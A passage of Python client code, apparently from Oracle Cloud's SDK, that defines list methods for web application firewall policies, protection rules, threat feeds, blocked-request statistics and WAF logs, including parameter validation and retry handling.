    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous paginated call.

    :param list[str] mod_security_rule_id: (optional)
        Filter rules using a list of ModSecurity rule IDs.

    :param list[str] action: (optional)
        Filter rules using a list of actions.

        Allowed values are: "OFF", "DETECT", "BLOCK"

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at the
        client level. Use one of the strategies from the :py:mod:`~oci.retry` module; this operation
        does not retry by default. Pass a :py:class:`~oci.retry.NoneRetryStrategy` instance to
        explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether this request should allow control characters in the response object.
        By default, control characters are not allowed in strings.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.ProtectionRule`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_protection_rules.py.html>`__ to see an example of how to use list_protection_rules API.
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/protectionRules"
    method = "GET"

    # Reject any keyword argument this operation does not recognize.
    expected_kwargs = frozenset([
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "limit",
        "page",
        "mod_security_rule_id",
        "action"
    ])
    unrecognized = [name for name in kwargs if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "list_protection_rules got unknown kwargs: {!r}".format(unrecognized))

    # Path parameters must be present and non-blank to build a valid URL.
    path_params = {
        "waasPolicyId": waas_policy_id
    }
    path_params = dict((k, v) for k, v in path_params.items() if v is not missing)
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Every entry in the `action` filter list must be a known action.
    if 'action' in kwargs:
        action_allowed_values = ["OFF", "DETECT", "BLOCK"]
        for action_value in kwargs['action']:
            if action_value not in action_allowed_values:
                raise ValueError(
                    "Invalid value for `action`, must be one of {0}".format(action_allowed_values)
                )

    # Assemble query parameters, then drop any that were not supplied.
    query_params = {
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "modSecurityRuleId": self.base_client.generate_collection_format_param(kwargs.get("mod_security_rule_id", missing), 'multi'),
        "action": self.base_client.generate_collection_format_param(kwargs.get("action", missing), 'multi')
    }
    query_params = dict((k, v) for k, v in query_params.items()
                        if v is not missing and v is not None)

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = dict((k, v) for k, v in header_params.items()
                         if v is not missing and v is not None)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # call_kwargs holds a reference to header_params, so the retry header
    # added below is still picked up by the call.
    call_kwargs = {
        "resource_path": resource_path,
        "method": method,
        "path_params": path_params,
        "query_params": query_params,
        "header_params": header_params,
        "response_type": "list[ProtectionRule]"
    }
    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def list_recommendations(self, waas_policy_id, **kwargs):
    """
    Gets the list of recommended Web Application Firewall protection rules.

    Use the `POST /waasPolicies/{waasPolicyId}/actions/acceptWafConfigRecommendations` method
    to accept recommended Web Application Firewall protection rules. For more information,
    see `WAF Protection Rules`__.
    The list is sorted by `key`, in ascending order.

    __ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/wafprotectionrules.htm

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide it when contacting Oracle about a particular request.

    :param str recommended_action: (optional)
        Matches recommended protection rules based on the selected action. If unspecified,
        rules with any action type are returned.

        Allowed values are: "DETECT", "BLOCK"

    :param int limit: (optional)
        The maximum number of items to return in a paginated call. Defaults to `10` when unspecified.

    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous paginated call.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at the
        client level. Use one of the strategies from the :py:mod:`~oci.retry` module; this operation
        does not retry by default. Pass a :py:class:`~oci.retry.NoneRetryStrategy` instance to
        explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether this request should allow control characters in the response object.
        By default, control characters are not allowed in strings.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.Recommendation`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_recommendations.py.html>`__ to see an example of how to use list_recommendations API.
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/recommendations"
    method = "GET"

    # Reject any keyword argument this operation does not recognize.
    expected_kwargs = frozenset([
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "recommended_action",
        "limit",
        "page"
    ])
    unrecognized = [name for name in kwargs if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "list_recommendations got unknown kwargs: {!r}".format(unrecognized))

    # Path parameters must be present and non-blank to build a valid URL.
    path_params = {
        "waasPolicyId": waas_policy_id
    }
    path_params = dict((k, v) for k, v in path_params.items() if v is not missing)
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Validate enum-style parameters before building the request.
    if 'recommended_action' in kwargs:
        recommended_action_allowed_values = ["DETECT", "BLOCK"]
        if kwargs['recommended_action'] not in recommended_action_allowed_values:
            raise ValueError(
                "Invalid value for `recommended_action`, must be one of {0}".format(recommended_action_allowed_values)
            )

    # Assemble query parameters, then drop any that were not supplied.
    query_params = {
        "recommendedAction": kwargs.get("recommended_action", missing),
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing)
    }
    query_params = dict((k, v) for k, v in query_params.items()
                        if v is not missing and v is not None)

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = dict((k, v) for k, v in header_params.items()
                         if v is not missing and v is not None)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # call_kwargs holds a reference to header_params, so the retry header
    # added below is still picked up by the call.
    call_kwargs = {
        "resource_path": resource_path,
        "method": method,
        "path_params": path_params,
        "query_params": query_params,
        "header_params": header_params,
        "response_type": "list[Recommendation]"
    }
    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def list_threat_feeds(self, waas_policy_id, **kwargs):
    """
    Gets the list of available web application threat intelligence feeds
    and the actions set for each feed. The list is sorted by `key`,
    in ascending order.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.

    :param int limit: (optional)
        The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.

    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous paginated call.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.

        This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
        The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.

        To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.

    :param bool allow_control_chars: (optional)
        allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object. By default, the response will not allow control characters in strings.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.ThreatFeed`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_threat_feeds.py.html>`__ to see an example of how to use list_threat_feeds API.
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/threatFeeds"
    method = "GET"

    # Reject any keyword argument this operation does not recognize.
    expected_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "limit",
        "page"
    ]
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "list_threat_feeds got unknown kwargs: {!r}".format(unrecognized))

    # Path template values must be present and non-blank.
    path_params = {
        "waasPolicyId": waas_policy_id
    }
    path_params = {name: value for (name, value) in six.iteritems(path_params) if value is not missing}
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Only forward query values the caller actually supplied.
    query_params = {}
    for wire_name, arg_name in (("limit", "limit"), ("page", "page")):
        value = kwargs.get(arg_name, missing)
        if value is not missing and value is not None:
            query_params[wire_name] = value

    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    opc_request_id = kwargs.get("opc_request_id", missing)
    if opc_request_id is not missing and opc_request_id is not None:
        header_params["opc-request-id"] = opc_request_id

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        response_type="list[ThreatFeed]")

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Mutates header_params in place before the request is issued.
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def list_waas_policies(self, compartment_id, **kwargs):
    """
    Gets a list of WAAS policies.

    :param str compartment_id: (required)
        The `OCID`__ of the compartment. This number is generated when the compartment is created.

        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.

    :param int limit: (optional)
        The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.

    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous paginated call.

    :param str sort_by: (optional)
        The value by which policies are sorted in a paginated 'List' call. If unspecified, defaults to `timeCreated`.

        Allowed values are: "id", "displayName", "timeCreated"

    :param str sort_order: (optional)
        The value of the sorting direction of resources in a paginated 'List' call. If unspecified, defaults to `DESC`.

        Allowed values are: "ASC", "DESC"

    :param list[str] id: (optional)
        Filter policies using a list of policy OCIDs.

    :param list[str] display_name: (optional)
        Filter policies using a list of display names.

    :param list[str] lifecycle_state: (optional)
        Filter policies using a list of lifecycle states.

        Allowed values are: "CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"

    :param datetime time_created_greater_than_or_equal_to: (optional)
        A filter that matches policies created on or after the specified date and time.

    :param datetime time_created_less_than: (optional)
        A filter that matches policies created before the specified date-time.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.

        This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
        The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.

        To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.

    :param bool allow_control_chars: (optional)
        allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object. By default, the response will not allow control characters in strings.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.WaasPolicySummary`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_waas_policies.py.html>`__ to see an example of how to use list_waas_policies API.
    """
    resource_path = "/waasPolicies"
    method = "GET"

    # Reject any keyword argument this operation does not recognize.
    expected_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "limit",
        "page",
        "sort_by",
        "sort_order",
        "id",
        "display_name",
        "lifecycle_state",
        "time_created_greater_than_or_equal_to",
        "time_created_less_than"
    ]
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "list_waas_policies got unknown kwargs: {!r}".format(unrecognized))

    # Enumerated arguments are validated before any network activity.
    if 'sort_by' in kwargs:
        allowed_sort_by = ["id", "displayName", "timeCreated"]
        if kwargs['sort_by'] not in allowed_sort_by:
            raise ValueError(
                "Invalid value for `sort_by`, must be one of {0}".format(allowed_sort_by)
            )

    if 'sort_order' in kwargs:
        allowed_sort_order = ["ASC", "DESC"]
        if kwargs['sort_order'] not in allowed_sort_order:
            raise ValueError(
                "Invalid value for `sort_order`, must be one of {0}".format(allowed_sort_order)
            )

    if 'lifecycle_state' in kwargs:
        allowed_lifecycle_states = ["CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"]
        for state in kwargs['lifecycle_state']:
            if state not in allowed_lifecycle_states:
                raise ValueError(
                    "Invalid value for `lifecycle_state`, must be one of {0}".format(allowed_lifecycle_states)
                )

    # Repeated (multi) query parameters are expanded by the base client.
    multi = self.base_client.generate_collection_format_param
    candidate_query = {
        "compartmentId": compartment_id,
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "sortBy": kwargs.get("sort_by", missing),
        "sortOrder": kwargs.get("sort_order", missing),
        "id": multi(kwargs.get("id", missing), 'multi'),
        "displayName": multi(kwargs.get("display_name", missing), 'multi'),
        "lifecycleState": multi(kwargs.get("lifecycle_state", missing), 'multi'),
        "timeCreatedGreaterThanOrEqualTo": kwargs.get("time_created_greater_than_or_equal_to", missing),
        "timeCreatedLessThan": kwargs.get("time_created_less_than", missing)
    }
    query_params = {name: value for (name, value) in six.iteritems(candidate_query)
                    if value is not missing and value is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    opc_request_id = kwargs.get("opc_request_id", missing)
    if opc_request_id is not missing and opc_request_id is not None:
        header_params["opc-request-id"] = opc_request_id

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        query_params=query_params,
        header_params=header_params,
        response_type="list[WaasPolicySummary]")

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Mutates header_params in place before the request is issued.
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def list_waas_policy_custom_protection_rules(self, waas_policy_id, **kwargs):
    """
    Gets the list of currently configured custom protection rules for a WAAS policy.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.

    :param int limit: (optional)
        The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.

    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous paginated call.

    :param list[str] mod_security_rule_id: (optional)
        Filter rules using a list of ModSecurity rule IDs.

    :param list[str] action: (optional)
        Filter rules using a list of actions.

        Allowed values are: "DETECT", "BLOCK"

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.

        This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
        The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.

        To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.

    :param bool allow_control_chars: (optional)
        allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object. By default, the response will not allow control characters in strings.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.WaasPolicyCustomProtectionRuleSummary`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_waas_policy_custom_protection_rules.py.html>`__ to see an example of how to use list_waas_policy_custom_protection_rules API.
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/customProtectionRules"
    method = "GET"

    # Reject any keyword argument this operation does not recognize.
    expected_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "limit",
        "page",
        "mod_security_rule_id",
        "action"
    ]
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "list_waas_policy_custom_protection_rules got unknown kwargs: {!r}".format(unrecognized))

    # Path template values must be present and non-blank.
    path_params = {
        "waasPolicyId": waas_policy_id
    }
    path_params = {name: value for (name, value) in six.iteritems(path_params) if value is not missing}
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Every entry of the `action` filter must be an allowed value.
    if 'action' in kwargs:
        allowed_actions = ["DETECT", "BLOCK"]
        for item in kwargs['action']:
            if item not in allowed_actions:
                raise ValueError(
                    "Invalid value for `action`, must be one of {0}".format(allowed_actions)
                )

    # Repeated (multi) query parameters are expanded by the base client.
    multi = self.base_client.generate_collection_format_param
    candidate_query = {
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "modSecurityRuleId": multi(kwargs.get("mod_security_rule_id", missing), 'multi'),
        "action": multi(kwargs.get("action", missing), 'multi')
    }
    query_params = {name: value for (name, value) in six.iteritems(candidate_query)
                    if value is not missing and value is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    opc_request_id = kwargs.get("opc_request_id", missing)
    if opc_request_id is not missing and opc_request_id is not None:
        header_params["opc-request-id"] = opc_request_id

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        response_type="list[WaasPolicyCustomProtectionRuleSummary]")

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Mutates header_params in place before the request is issued.
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def list_waf_blocked_requests(self, waas_policy_id, **kwargs):
    """
    Gets the number of blocked requests by a Web Application Firewall feature in five minute blocks, sorted by `timeObserved` in ascending order (starting from oldest data).

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.

    :param datetime time_observed_greater_than_or_equal_to: (optional)
        A filter that limits returned events to those occurring on or after a date and time, specified in RFC 3339 format. If unspecified, defaults to 30 minutes before receipt of the request.

    :param datetime time_observed_less_than: (optional)
        A filter that limits returned events to those occurring before a date and time, specified in RFC 3339 format.

    :param int limit: (optional)
        The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.

    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous paginated call.

    :param list[str] waf_feature: (optional)
        Filter stats by the Web Application Firewall feature that triggered the block action. If unspecified, data for all WAF features will be returned.

        Allowed values are: "PROTECTION_RULES", "JS_CHALLENGE", "ACCESS_RULES", "THREAT_FEEDS", "HUMAN_INTERACTION_CHALLENGE", "DEVICE_FINGERPRINT_CHALLENGE", "CAPTCHA", "ADDRESS_RATE_LIMITING"

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.

        This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
        The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.

        To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.

    :param bool allow_control_chars: (optional)
        allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object. By default, the response will not allow control characters in strings.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.WafBlockedRequest`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_waf_blocked_requests.py.html>`__ to see an example of how to use list_waf_blocked_requests API.
    """
    resource_path = "/waasPolicies/{waasPolicyId}/reports/waf/blocked"
    method = "GET"

    # Reject any keyword argument this operation does not recognize.
    expected_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "time_observed_greater_than_or_equal_to",
        "time_observed_less_than",
        "limit",
        "page",
        "waf_feature"
    ]
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "list_waf_blocked_requests got unknown kwargs: {!r}".format(unrecognized))

    # Path template values must be present and non-blank.
    path_params = {
        "waasPolicyId": waas_policy_id
    }
    path_params = {name: value for (name, value) in six.iteritems(path_params) if value is not missing}
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Every entry of the `waf_feature` filter must be an allowed value.
    if 'waf_feature' in kwargs:
        allowed_waf_features = ["PROTECTION_RULES", "JS_CHALLENGE", "ACCESS_RULES", "THREAT_FEEDS", "HUMAN_INTERACTION_CHALLENGE", "DEVICE_FINGERPRINT_CHALLENGE", "CAPTCHA", "ADDRESS_RATE_LIMITING"]
        for item in kwargs['waf_feature']:
            if item not in allowed_waf_features:
                raise ValueError(
                    "Invalid value for `waf_feature`, must be one of {0}".format(allowed_waf_features)
                )

    # Repeated (multi) query parameters are expanded by the base client.
    multi = self.base_client.generate_collection_format_param
    candidate_query = {
        "timeObservedGreaterThanOrEqualTo": kwargs.get("time_observed_greater_than_or_equal_to", missing),
        "timeObservedLessThan": kwargs.get("time_observed_less_than", missing),
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "wafFeature": multi(kwargs.get("waf_feature", missing), 'multi')
    }
    query_params = {name: value for (name, value) in six.iteritems(candidate_query)
                    if value is not missing and value is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    opc_request_id = kwargs.get("opc_request_id", missing)
    if opc_request_id is not missing and opc_request_id is not None:
        header_params["opc-request-id"] = opc_request_id

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        response_type="list[WafBlockedRequest]")

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Mutates header_params in place before the request is issued.
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def list_waf_logs(self, waas_policy_id, **kwargs):
    """
    Gets structured Web Application Firewall event logs for a WAAS
    policy. Sorted by the `timeObserved` in ascending order (starting from the
    oldest recorded event).

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.

    :param int limit: (optional)
        The maximum number of items to return in a paginated call. If unspecified, defaults to `20`.

    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous paginated call.

    :param datetime time_observed_greater_than_or_equal_to: (optional)
        A filter that matches log entries where the observed event occurred on or after a date and time specified in RFC 3339 format. If unspecified, defaults to two hours before receipt of the request.

    :param datetime time_observed_less_than: (optional)
        A filter that matches log entries where the observed event occurred before a date and time, specified in RFC 3339 format.

    :param str text_contains: (optional)
        A full text search for logs.

    :param list[str] access_rule_key: (optional)
        Filters logs by access rule key.

    :param list[str] action: (optional)
        Filters logs by Web Application Firewall action.

        Allowed values are: "BLOCK", "DETECT", "BYPASS", "LOG", "REDIRECTED"

    :param list[str] client_address: (optional)
        Filters logs by client IP address.

    :param list[str] country_code: (optional)
        Filters logs by country code. Country codes are in ISO 3166-1 alpha-2 format. For a list of codes, see `ISO's website`__.

        __ https://www.iso.org/obp/ui/#search/code/

    :param list[str] country_name: (optional)
        Filter logs by country name.

    :param list[str] fingerprint: (optional)
        Filter logs by device fingerprint.

    :param list[str] http_method: (optional)
        Filter logs by HTTP method.

        Allowed values are: "OPTIONS", "GET", "HEAD", "POST", "PUT", "DELETE", "TRACE", "CONNECT"

    :param list[str] incident_key: (optional)
        Filter logs by incident key.

    :param list[str] log_type: (optional)
        Filter by log type. For more information about WAF logs, see `Logs`__.

        __ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/logs.htm

        Allowed values are: "ACCESS", "PROTECTION_RULES", "JS_CHALLENGE", "CAPTCHA", "ACCESS_RULES", "THREAT_FEEDS", "HUMAN_INTERACTION_CHALLENGE", "DEVICE_FINGERPRINT_CHALLENGE", "ADDRESS_RATE_LIMITING"

    :param list[str] origin_address: (optional)
        Filter by origin IP address.

    :param list[str] referrer: (optional)
        Filter by referrer.

    :param list[str] request_url: (optional)
        Filter by request URL.

    :param list[int] response_code: (optional)
        Filter by response code.

    :param list[str] threat_feed_key: (optional)
        Filter by threat feed key.

    :param list[str] user_agent: (optional)
        Filter by user agent.

    :param list[str] protection_rule_key: (optional)
        Filter by protection rule key.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.

        This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
        The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.

        To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.

    :param bool allow_control_chars: (optional)
        allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object. By default, the response will not allow control characters in strings.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.WafLog`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_waf_logs.py.html>`__ to see an example of how to use list_waf_logs API.
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafLogs"
    method = "GET"

    # Reject any keyword argument this operation does not recognize.
    expected_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "limit",
        "page",
        "time_observed_greater_than_or_equal_to",
        "time_observed_less_than",
        "text_contains",
        "access_rule_key",
        "action",
        "client_address",
        "country_code",
        "country_name",
        "fingerprint",
        "http_method",
        "incident_key",
        "log_type",
        "origin_address",
        "referrer",
        "request_url",
        "response_code",
        "threat_feed_key",
        "user_agent",
        "protection_rule_key"
    ]
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "list_waf_logs got unknown kwargs: {!r}".format(unrecognized))

    # Path template values must be present and non-blank.
    path_params = {
        "waasPolicyId": waas_policy_id
    }
    path_params = {name: value for (name, value) in six.iteritems(path_params) if value is not missing}
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Each list-valued enum filter is validated element by element.
    if 'action' in kwargs:
        allowed_actions = ["BLOCK", "DETECT", "BYPASS", "LOG", "REDIRECTED"]
        for item in kwargs['action']:
            if item not in allowed_actions:
                raise ValueError(
                    "Invalid value for `action`, must be one of {0}".format(allowed_actions)
                )

    if 'http_method' in kwargs:
        allowed_http_methods = ["OPTIONS", "GET", "HEAD", "POST", "PUT", "DELETE", "TRACE", "CONNECT"]
        for item in kwargs['http_method']:
